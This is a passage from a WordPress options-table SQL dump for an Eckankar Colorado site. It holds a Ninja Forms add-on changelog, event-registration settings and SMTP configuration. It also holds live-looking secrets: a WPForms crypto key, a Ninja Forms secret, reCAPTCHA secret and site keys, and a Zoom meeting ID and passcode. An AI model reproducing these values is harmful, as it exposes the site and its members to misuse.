an issue that sometimes prevented actions from firing, even when they had no attached conditions.<\\/li>\\n<li>Forms with a Stripe or PayPal action should now properly complete once returning from the payment screen.<\\/li>\\n<\\/ul>\\n<p>3.0.25 (16 September 2019)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Hidden fields should now properly evaluate against empty.<\\/li>\\n<li>Recaptcha fields that are hidden will now properly render once shown.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Fields can now be conditionally set as required.<\\/li>\\n<\\/ul>\\n<p>3.0.24 (23 January 2019)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Conditions based on calculations should now be properly triggered on form load.<\\/li>\\n<li>Resolved an issue that was sometimes causing actions to always fire, regardless of conditions.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Several incompatible field types have been removed from the list of fields that conditions can be based on.<\\/li>\\n<li>Inverse statements will no longer be created by default on new do statements.<\\/li>\\n<\\/ul>\\n<p>3.0.23 (11 January 2019)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Action processing will now ignore incomplete conditional statements, which previously prevented the action from firing.<\\/li>\\n<\\/ul>\\n<p>3.0.22 (14 June 2018)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Fields now display admin labels (if they exist) instead of labels in condition blocks.<\\/li>\\n<\\/ul>\\n<p>3.0.21 (3 May 2018)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Equals conditions based on calculations should now work properly.<\\/li>\\n<\\/ul>\\n<p>3.0.20 (19 April 2018)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Duplicating a field should no longer cause conditional logic to lose track of it as a conditional trigger.<\\/li>\\n<\\/ul>\\n<p>3.0.19 (26 March 2018)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Conditions based on the selection of single checkbox fields should now function properly.<\\/li>\\n<\\/ul>\\n<p>3.0.18 (24 February 2018)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Checkbox values can now be updated via conditional logic again.<\\/li>\\n<\\/ul>\\n<p>3.0.17 (22 August 2017)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Actions that use the greaterthan and lessthan comparators should work properly.<\\/li>\\n<li>Incorrectly setup conditions should no longer cause form display to crash.<\\/li>\\n<\\/ul>\\n<p>3.0.16 (02 August 2017)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Action conditions should now properly support calculations.<\\/li>\\n<li>Fixed a bug that could cause calculations to fail when using Conditional Logic. <\\/li>\\n<\\/ul>\\n<p>3.0.15 (27 June 2017)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>When setting up conditions, fields should now appear in alphabetical order within the field list.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Conditional Logic should now work properly with the Save Progress add-on.<\\/li>\\n<\\/ul>\\n<p>3.0.14 (31 May 2017)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Tabbing through a checkbox list that has conditions will no longer trigger those conditions incorrectly.<\\/li>\\n<\\/ul>\\n<p>3.0.13 (02 May 2017)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a fatal error with PHP version 7.1 and higher.<\\/li>\\n<\\/ul>\\n<p>3.0.12 (11 April 2017)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Actions like Stripe can now be conditionally ran.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that caused some conditions to evaluate improperly.<\\/li>\\n<\\/ul>\\n<p>3.0.11 (19 January 2017)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Textbox fields can now be compared to an empty string.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Help text should render properly for conditionally shown\\/hidden fields.<\\/li>\\n<\\/ul>\\n<p>3.0.10 (09 December 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause the condition drawer to fail to open if a field was deleted.<\\/li>\\n<li>Conditional Logic shouldn\'t prevent or enable actions that are otherwise disabled.<\\/li>\\n<\\/ul>\\n<p>3.0.9 (15 November 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug with list field options incorrectly triggering conditions based on partial matches.<\\/li>\\n<li>Fixed a bug with missing field values causing the form to not submit properly.<\\/li>\\n<li>Fixed a bug with false-positives when tabbing through a checkbox field.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Use the form cache for getting field data.<\\/li>\\n<li>Corrected processing for different data structures.<\\/li>\\n<li>Added a check for manually disabled actions, so as to not re-enable with conditions.<\\/li>\\n<\\/ul>\\n<p>3.0.8 (25 October 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>The \\\"any\\\" operator in actions should work properly in all cases.<\\/li>\\n<li>Fixed a bug that caused fatal errors when conditions weren\'t configured properly.<\\/li>\\n<\\/ul>\\n<p>3.0.7 (13 October 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Creating conditions can now properly be based upon calculations.<\\/li>\\n<li>Fixed a bug with radio lists and the select option trigger.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>When building conditions, fields should now show up with their admin label if one is set.<\\/li>\\n<\\/ul>\\n<p>3.0.6 (03 October 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Required fields should no longer attempt to valide upon show.<\\/li>\\n<li>Country fields can now be used in conditions.<\\/li>\\n<li>Fixed a couple of conversion issues with older form imports.<\\/li>\\n<li>Conditionally shown\\/hidden fields should all show properly in submission data.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Conditions can now be created using &gt; and &lt; with textboxes and textareas.<\\/li>\\n<\\/ul>\\n<p>3.0.5 (28 September 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>File Uploads should now show in Conditional Logic conditions.<\\/li>\\n<\\/ul>\\n<p>3.0.4 (22 September 2016)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause the builder to crash when fields were removed if there was a condition based upon that field.<\\/li>\\n<\\/ul>\\n<p>3.0.3 (11 September 2016)<\\/p>\\n<ul>\\n<li>\\n<p>Bugs:*<\\/p>\\n<\\/li>\\n<li>\\n<p>Fixed a bug that caused the condition edit drawer to fail to open.<\\/p>\\n<\\/li>\\n<\\/ul>\\n<p>3.0.2 (09 September 2016)<\\/p>\\n<ul>\\n<li>Fixed a bug with conversion.<\\/li>\\n<\\/ul>\\n<p>3.0.1 (06 September 2016)<\\/p>\\n<ul>\\n<li>Updated with Ninja Forms v3.x compatibility<\\/li>\\n<\\/ul>\\n<p>3.0 (06 September 2016)<\\/p>\\n<ul>\\n<li>Updated with Ninja Forms v3.x compatibility<\\/li>\\n<li>Deprecated Ninja Forms v2.9.x compatible code<\\/li>\\n<\\/ul>\\n<p>1.4.0 (13 April 2016)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Update for compatibility with WordPress 4.5 ( specifically the underscore.js update ).<\\/li>\\n<\\/ul>\\n<p>1.3.9 (26 May 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Changed values should now reset to defaults when using the \\\"clear form\\\" setting.<\\/li>\\n<\\/ul>\\n<p>1.3.8 (12 May 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Array elements should now work properly with the \\\"Contains\\\" action conditionals.<\\/li>\\n<li>Fixed a PHP Notice.<\\/li>\\n<li>Decimals should now be compared properly.<\\/li>\\n<li>Fixed a bug that could cause a PHP error if asp style tags are enabled in PHP.<\\/li>\\n<\\/ul>\\n<p>1.3.7 (18 March 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause conditional field data to submit improperly.<\\/li>\\n<\\/ul>\\n<p>1.3.6 (17 March 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause JavaScript to load older versions of files.<\\/li>\\n<\\/ul>\\n<p>1.3.5 (4 March 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause conditionally hidden calculations to fail.<\\/li>\\n<li>List options should work properly in version 2.9 of Ninja Forms.<\\/li>\\n<\\/ul>\\n<p>1.3.4 (3 March 2015)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could prevent new conditions from being added.<\\/li>\\n<\\/ul>\\n<p>1.3.3 (27 February 2015)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Preparing for the release of Ninja Forms version 2.9.<\\/li>\\n<\\/ul>\\n<p>1.3.1 (17 November 2014)<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixing bad domain\\/translation issues.<\\/li>\\n<li>Fixed a bug with checkbox lists and notification conditions.<\\/li>\\n<li>Duplicating a page with conditions using multi-part forms should now properly duplicate those conditions.<\\/li>\\n<li>Fixed several issues related to i18n.<\\/li>\\n<\\/ul>\\n<p>1.3 (28 October 2014)<\\/p>\\n<p><em>Features:<\\/em><\\/p>\\n<ul>\\n<li>Conditional Logic now supports conditional notifications.<\\/li>\\n<li>Only show, display, or send a notification when a user submits specific form data.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Custom conditional triggers can be added for notifications.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that caused conditionals based upon other conditional fields to work improperly.<\\/li>\\n<li>Conditionally hidden totals should now be properly removed from the all fields table.<\\/li>\\n<\\/ul>\\n<p>1.2.7 (24 July 2014)<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Compatibility with Ninja Forms 2.7.<\\/li>\\n<\\/ul>\\n<p>1.2.6<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented some users from getting automatic updates.<\\/li>\\n<\\/ul>\\n<p>1.2.5<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could cause conditions not to work in some AJAX setups.<\\/li>\\n<\\/ul>\\n<p>1.2.4<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Conditionals should now not be applied when editing a form in the wp-admin.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug with the change value setting.<\\/li>\\n<\\/ul>\\n<p>1.2.3<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented the \'add_value\' and \'change_value\' actions from working properly in some instances.<\\/li>\\n<\\/ul>\\n<p>1.2.2<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug with required fields that were conditionally hidden.<\\/li>\\n<li>Removed console logs that were causing problems in IE9.<\\/li>\\n<li>Fixed a bug that caused the Add Value setting not to work properly.<\\/li>\\n<\\/ul>\\n<p>1.2.1<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed several bugs that related to pre-populating conditional fields with multi-part forms.<\\/li>\\n<\\/ul>\\n<p>1.2<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Added support for the new Ninja Forms loading system. This should significantly improve loading speed for forms that use conditionals.<\\/li>\\n<\\/ul>\\n<p>1.1.1<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that could prevent conditionals from working properly with required fields.<\\/li>\\n<li>Fixed a bug that could cause conditional logic to break when labels contained long strings of HTML.<\\/li>\\n<\\/ul>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Updating the JS so that when an element is shown\\/hidden, a jQuery event is fired after the show\\/hide is complete.<\\/li>\\n<li>Removed old licensing file.<\\/li>\\n<\\/ul>\\n<p>1.1<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that caused the \\\"Change Value\\\" conditional action to fail in some cases.<\\/li>\\n<li>Fixed a bug that prevented conditionals from working properly with hidden fields.<\\/li>\\n<li>Fixed several PHP Notices.<\\/li>\\n<\\/ul>\\n<p>1.0.10<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented calculations from working properly when a field that the calculation was based upon was hidden with conditional logic.<\\/li>\\n<\\/ul>\\n<p>1.0.9<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Added a \\\"visible\\\" data attribute.<\\/li>\\n<li>Moved functions from Ninja Forms core to this extension.<\\/li>\\n<\\/ul>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed several bugs related to using calculation fields and conditionals.<\\/li>\\n<\\/ul>\\n<p>1.0.8<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Changed the license and auto-update system to the one available in Ninja Forms 2.2.47.<\\/li>\\n<\\/ul>\\n<p>1.0.7<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Changed references to wpninjas.com to ninjaforms.com.<\\/li>\\n<\\/ul>\\n<p>1.0.6<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented conditionals from working properly in some installs.<\\/li>\\n<\\/ul>\\n<p>1.0.5<\\/p>\\n<ul>\\n<li>Fixed a bug that caused Conditionals to break calculation fields if they were hidden.<\\/li>\\n<\\/ul>\\n<p>1.0.4<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Updates for compatibility with WordPress 3.6<\\/li>\\n<\\/ul>\\n<p>1.0.3<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented conditionals from working properly with calculation fields.<\\/li>\\n<\\/ul>\\n<p>1.0.2<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that caused conditionals with multiple criteria to fail when connected with the \\\"All\\\" parameter.<\\/li>\\n<\\/ul>\\n<p>1.0.1<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>The Conditionals Extension can now be used with the Multi-Part Extension to show or hide entire pages.<\\/li>\\n<\\/ul>\\n<p>1.0<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that was causing dropdown list fields to work improperly with Conditional Logic.<\\/li>\\n<\\/ul>\\n<p>0.9<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented conditionals from working properly with multi-checkbox lists and multi-radio button lists.<\\/li>\\n<\\/ul>\\n<p>0.8<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Changed the display JS slightly to be more efficient.<\\/li>\\n<\\/ul>\\n<p>0.7<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Conditional fields should now behave as expected when editing user submissions.<\\/li>\\n<\\/ul>\\n<p>0.6<\\/p>\\n<p><em>Bugs:<\\/em><\\/p>\\n<ul>\\n<li>Fixed a bug that prevented conditionals from working properly with checkbox and radio list types.<\\/li>\\n<\\/ul>\\n<p>0.5<\\/p>\\n<p><em>Changes:<\\/em><\\/p>\\n<ul>\\n<li>Moved a JS function from ninja-forms-conditionals-admin.js to the ninja-forms-admin.js.<\\/li>\\n<\\/ul>\\n<p>0.4<\\/p>\\n<ul>\\n<li>Fixed a bug that prevented multiple forms with conditionals from being placed on the same page.<\\/li>\\n<\\/ul>\\n<p>0.3<\\/p>\\n<ul>\\n<li>Various bug fixes including:<\\/li>\\n<li>Adding multiple forms with conditions to a single page will now work normally.<\\/li>\\n<\\/ul>\\n<p>0.2<\\/p>\\n<ul>\\n<li>Various bug fixes.<\\/li>\\n<li>Changed the way that javascript and css files are loaded in extensions.<\\/li>\\n<\\/ul>\\n\"]}\";}','no'),(2036528,'disallowed_keys','','no'),(2036529,'comment_previously_approved','1','yes'),(2036530,'auto_plugin_theme_update_emails','a:0:{}','no'),(2036531,'finished_updating_comment_type','1','yes'),(2098087,'wpforms_crypto_secret_key','knI6uZ8ecOlKE19ETtMGdmYWtkK0nACMeOulgHF8nqM=','yes'),(2216770,'aj_gtmetrix_api_key','','yes'),(2247252,'_transient_em_get_event_listing_type-transient-version','1599446956','yes'),(2247273,'event_listing_type_children','a:0:{}','yes'),(2247274,'_transient_em_get_event_listing_category-transient-version','1599446956','yes'),(2247286,'event_listing_category_children','a:0:{}','yes'),(2247295,'widget_widget_recent_events','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(2247296,'widget_widget_featured_events','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(2247297,'widget_widget_upcoming_events','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(2325267,'cf_pro_db_v','2','yes'),(2325268,'CF_DB','7','yes'),(2325269,'widget_caldera_forms_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(2325273,'_calderaforms_lastupdate','1.9.4','yes'),(2325797,'_caldera_forms_styleincludes','a:3:{s:5:\"alert\";b:1;s:4:\"form\";b:1;s:4:\"grid\";b:1;}','yes'),(2432073,'ninja-forms-views-secret','9bOJ4yMJodDk4wknXCOdaU6Sp086d0m5u32qxMyX','yes'),(2432100,'boldgrid_backup_environment','a:3:{s:8:\"hostname\";s:28:\"server.eckankar-colorado.org\";s:10:\"phpversion\";s:6:\"8.0.30\";s:9:\"wpversion\";s:5:\"6.4.1\";}','yes'),(2439322,'rtec_db_version','1.6','yes'),(2439323,'rtec_options','a:97:{s:10:\"first_show\";b:1;s:13:\"first_require\";b:1;s:9:\"last_show\";b:1;s:12:\"last_require\";b:1;s:10:\"email_show\";b:1;s:13:\"email_require\";b:1;s:10:\"phone_show\";b:0;s:13:\"phone_require\";b:0;s:17:\"phone_valid_count\";s:5:\"7, 10\";s:17:\"recaptcha_require\";b:0;s:10:\"other_show\";b:0;s:13:\"other_require\";b:0;s:14:\"message_source\";s:6:\"custom\";s:24:\"terms_conditions_require\";b:0;s:18:\"disable_by_default\";b:1;s:29:\"visitors_can_edit_what_status\";b:1;s:21:\"show_registrants_data\";b:0;s:19:\"limit_registrations\";b:0;s:14:\"only_logged_in\";b:0;s:16:\"show_log_in_form\";b:1;s:32:\"include_attendance_count_message\";b:0;s:26:\"include_attendance_message\";b:0;s:21:\"using_custom_template\";b:0;s:11:\"preserve_db\";b:0;s:22:\"preserve_registrations\";b:1;s:17:\"preserve_settings\";b:1;s:20:\"check_for_duplicates\";b:0;s:33:\"attendance_count_message_location\";a:2:{i:0;s:12:\"above_button\";i:1;s:22:\"above_description_list\";}s:32:\"add_registration_management_tool\";b:1;s:17:\"template_location\";s:43:\"tribe_events_single_event_after_the_content\";s:12:\"display_type\";s:12:\"click_reveal\";s:25:\"default_max_registrations\";s:4:\"1000\";s:23:\"error_duplicate_message\";s:42:\"You have already registered for this event\";s:21:\"registration_deadline\";s:1:\"0\";s:26:\"registration_deadline_unit\";s:4:\"3600\";s:11:\"first_label\";s:5:\"First\";s:11:\"first_error\";s:28:\"Please enter your first name\";s:10:\"last_label\";s:4:\"Last\";s:10:\"last_error\";s:27:\"Please enter your last name\";s:11:\"email_label\";s:5:\"Email\";s:11:\"email_error\";s:34:\"Please enter a valid email address\";s:11:\"phone_label\";s:5:\"Phone\";s:11:\"phone_error\";s:33:\"Please enter a valid phone number\";s:11:\"other_label\";s:5:\"Other\";s:11:\"other_error\";s:16:\"This is required\";s:18:\"custom_field_names\";s:0:\"\";s:22:\"terms_conditions_label\";s:33:\"I accept the terms and conditions\";s:21:\"terms_conditions_link\";s:0:\"\";s:27:\"terms_conditions_link_label\";s:25:\"Terms and Conditions Page\";s:22:\"terms_conditions_error\";s:16:\"This is required\";s:14:\"recaptcha_type\";s:6:\"google\";s:15:\"recaptcha_label\";s:7:\"What is\";s:15:\"recaptcha_error\";s:16:\"Please try again\";s:18:\"recaptcha_site_key\";s:40:\"6LcydLsSAAAAAKY_OLZyhAIbgioGmuQM-HlwndQg\";s:20:\"recaptcha_secret_key\";s:40:\"6LcydLsSAAAAAGzYaNvLp5G-LL4zhoFVu5EafYGG\";s:13:\"register_text\";s:8:\"Register\";s:33:\"attendance_count_message_template\";s:25:\"Attendance: {num} / {max}\";s:23:\"attendance_message_type\";s:2:\"up\";s:25:\"attendance_text_before_up\";s:4:\"Join\";s:24:\"attendance_text_after_up\";s:7:\"others!\";s:22:\"attendance_text_one_up\";s:21:\"Join one other person\";s:24:\"attendance_text_none_yet\";s:13:\"Be the first!\";s:28:\"registrations_closed_message\";s:39:\"Registrations are closed for this event\";s:11:\"submit_text\";s:6:\"Submit\";s:15:\"success_message\";s:66:\"Success! Please check your email inbox for a confirmation message.\";s:20:\"unregister_link_text\";s:26:\"Unregister from this event\";s:22:\"success_unregistration\";s:27:\"You have been unregistered.\";s:27:\"already_registered_question\";s:19:\"Already registered?\";s:29:\"already_registered_directions\";s:42:\"Use this tool to manage your registration.\";s:21:\"enter_your_email_text\";s:35:\"Enter your registered email address\";s:25:\"send_unregister_link_text\";s:20:\"Send unregister link\";s:21:\"please_log_in_message\";s:18:\"Log in to register\";s:20:\"registrants_data_who\";s:3:\"any\";s:19:\"attendee_list_title\";s:20:\"Currently Registered\";s:5:\"width\";s:3:\"100\";s:10:\"width_unit\";s:1:\"%\";s:13:\"form_bg_color\";s:1:\"#\";s:15:\"button_bg_color\";s:1:\"#\";s:17:\"button_text_color\";s:1:\"#\";s:10:\"custom_css\";s:0:\"\";s:9:\"custom_js\";s:0:\"\";s:12:\"phone_format\";s:1:\"1\";s:8:\"_require\";b:0;s:5:\"_show\";b:0;s:20:\"disable_notification\";b:0;s:20:\"disable_confirmation\";b:0;s:23:\"use_custom_notification\";b:0;s:16:\"notify_organizer\";b:0;s:25:\"confirmation_from_address\";s:31:\"webmaster@eckankar-colorado.org\";s:18:\"custom_date_format\";s:12:\"F j, Y g:i a\";s:10:\"recipients\";s:31:\"webmaster@eckankar-colorado.org\";s:17:\"notification_from\";s:9:\"WordPress\";s:20:\"notification_subject\";s:25:\"Registration Notification\";s:20:\"notification_message\";s:362:\"<p>The following submission was made for: {event-title} at {venue} on {event-date}</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>First:</td>\r\n<td>{first}</td>\r\n</tr>\r\n<tr>\r\n<td>Last:</td>\r\n<td>{last}</td>\r\n</tr>\r\n<tr>\r\n<td>Email:</td>\r\n<td>{email}</td>\r\n</tr>\r\n<tr>\r\n<td>Phone:</td>\r\n<td>{phone}</td>\r\n</tr>\r\n<tr>\r\n<td>Other:</td>\r\n<td>{other}</td>\r\n</tr>\r\n</tbody>\r\n</table>\";s:17:\"confirmation_from\";s:49:\"Eckankar In Colorado - Virtual Event Registration\";s:20:\"confirmation_subject\";s:13:\"{event-title}\";s:20:\"confirmation_message\";s:3112:\"<div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\">\r\n<div class=\"container\">\r\n<div class=\"\" style=\"padding-top: 0;padding-bottom: 0px\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\"><span style=\"font-size: 42px;font-weight: bold\"><img class=\"alignnone wp-image-262315 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/12/email-img-registration-600-3.jpg\" alt=\"\" width=\"600\" height=\"238\" /></span></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding: 0px 12px 12px;background-color: #efefef;border: 1px solid #cccccc\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\"><span style=\"color: #333333;font-size: 23px\">Hello {first},</span></p>\r\n<p class=\"\"><span style=\"color: #333333;font-size: 20px\">Thank You For Registering for our Zoom Event! <br />\r\n</span></p>\r\n<p class=\"\"><span style=\"color: #333333;font-size: 18px\">You are signed up for the \"<span style=\"font-weight: bold;color: #23507d\">{event-title}</span>\" </span><span style=\"color: #333333;font-size: 18px\">on <span style=\"font-weight: bold;color: #23507d\">{event-date}</span> at <span style=\"font-weight: bold;color: #23507d\">10:30 AM to 11:30 AM.</span></span></p>\r\n<div style=\"color: #333333\">\r\n<p class=\"\"><span style=\"color: #333333;font-size: 18px\"><b>For those of you joining with the Zoom App:<br />\r\n</b><span style=\"color: #800000\"><b>Meeting ID:</b></span> 891 2510 3432 <br />\r\n<b><span style=\"color: #800000\">Passcode</span>:</b> 162109 </span></p>\r\n<p><b><span style=\"color: #333333;font-size: 18px\">Join Zoom Meeting from a web browser:</span></b><br />\r\n<span style=\"color: #333333;font-size: 18px\"><a href=\"https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09\" rel=\"noopener noreferrer\">https://us02web.zoom.us/j/89125103432?pwd=QVRETUo3bENGM0lKZzhDN2pjVGZnQT09</a></span></p>\r\n<p class=\"\"><span style=\"color: #333333;font-size: 18px\">After you click the link, you will be prompted to either download the app to enter the meeting or enter through your browser. <strong>Please note that Zoom works best if you download the app. It is more stable and has more functions. Select “use computer audio” for sound.</strong></span></p>\r\n<p><span style=\"color: #333333;font-size: 18px\">Please join the meeting 5 - 10 minutes ahead of time to help us start on time. We look forward to seeing you at this online event.</span></p>\r\n</div>\r\n<p class=\"\"><span style=\"color: #333333;font-size: 18px\"><em>See you there!</em></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section color1-background-color color-1-text-contrast bg-background-color\" style=\"background-color: #f5e3c4\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding: 9px;background-color: #f5e3c4\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><span style=\"color: #5e5e5e;font-size: 16px\">If you have any questions regarding the origin of this form, please feel free to contact the <a href=\"https://eckankar-colorado.org\">Eckankar In Colorado</a> webmaster: webmaster@eckankar-colorado.org</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\";}','yes'),(2724002,'updraft_unlocked_wpo_cache_preloader_creating_tasks','1','no'),(2724003,'updraft_last_lock_time_wpo_cache_preloader_creating_tasks','2020-10-24 16:21:36','no'),(2724004,'updraft_semaphore_wpo_cache_preloader_creating_tasks','0','no'),(3007983,'auto_update_plugins','a:0:{}','no'),(3008047,'rsssl_mixed_content_scan_dismissed','1','no'),(3008048,'rsssl_google_analytics_dismissed','1','no'),(3008049,'rsssl_remaining_tasks','1','yes'),(3058121,'wp_mail_smtp_initial_version','2.5.1','no'),(3058122,'wp_mail_smtp_version','3.4.0','no'),(3058123,'wp_mail_smtp','a:11:{s:4:\"mail\";a:6:{s:10:\"from_email\";s:31:\"webmaster@eckankar-colorado.org\";s:9:\"from_name\";s:20:\"Eckankar In Colorado\";s:6:\"mailer\";s:4:\"smtp\";s:11:\"return_path\";b:1;s:16:\"from_email_force\";b:1;s:15:\"from_name_force\";b:1;}s:4:\"smtp\";a:7:{s:7:\"autotls\";b:1;s:4:\"auth\";b:1;s:4:\"host\";s:29:\"secure147.inmotionhosting.com\";s:10:\"encryption\";s:3:\"tls\";s:4:\"port\";i:587;s:4:\"user\";s:31:\"webmaster@eckankar-colorado.org\";s:4:\"pass\";s:0:\"\";}s:7:\"smtpcom\";a:2:{s:7:\"api_key\";s:0:\"\";s:7:\"channel\";s:0:\"\";}s:10:\"sendinblue\";a:2:{s:7:\"api_key\";s:0:\"\";s:6:\"domain\";s:0:\"\";}s:7:\"mailgun\";a:3:{s:7:\"api_key\";s:0:\"\";s:6:\"domain\";s:0:\"\";s:6:\"region\";s:2:\"US\";}s:8:\"sendgrid\";a:2:{s:7:\"api_key\";s:0:\"\";s:6:\"domain\";s:0:\"\";}s:5:\"gmail\";a:2:{s:9:\"client_id\";s:0:\"\";s:13:\"client_secret\";s:0:\"\";}s:7:\"general\";a:1:{s:29:\"summary_report_email_disabled\";b:1;}s:8:\"postmark\";a:2:{s:16:\"server_api_token\";s:0:\"\";s:14:\"message_stream\";s:0:\"\";}s:9:\"sparkpost\";a:2:{s:7:\"api_key\";s:0:\"\";s:6:\"region\";s:2:\"US\";}s:9:\"sendlayer\";a:1:{s:7:\"api_key\";s:0:\"\";}}','no'),(3058124,'wp_mail_smtp_activated_time','1606840613','no'),(3058125,'wp_mail_smtp_activated','a:1:{s:4:\"lite\";i:1606840613;}','yes'),(3058128,'wp_mail_smtp_migration_version','5','yes'),(3058132,'wp_mail_smtp_review_notice','a:2:{s:4:\"time\";i:1608140341;s:9:\"dismissed\";b:1;}','yes'),(3058138,'wp_mail_smtp_notifications','a:4:{s:6:\"update\";i:1682100916;s:4:\"feed\";a:0:{}s:6:\"events\";a:0:{}s:9:\"dismissed\";a:1:{i:0;s:2:\"29\";}}','yes'),(3058368,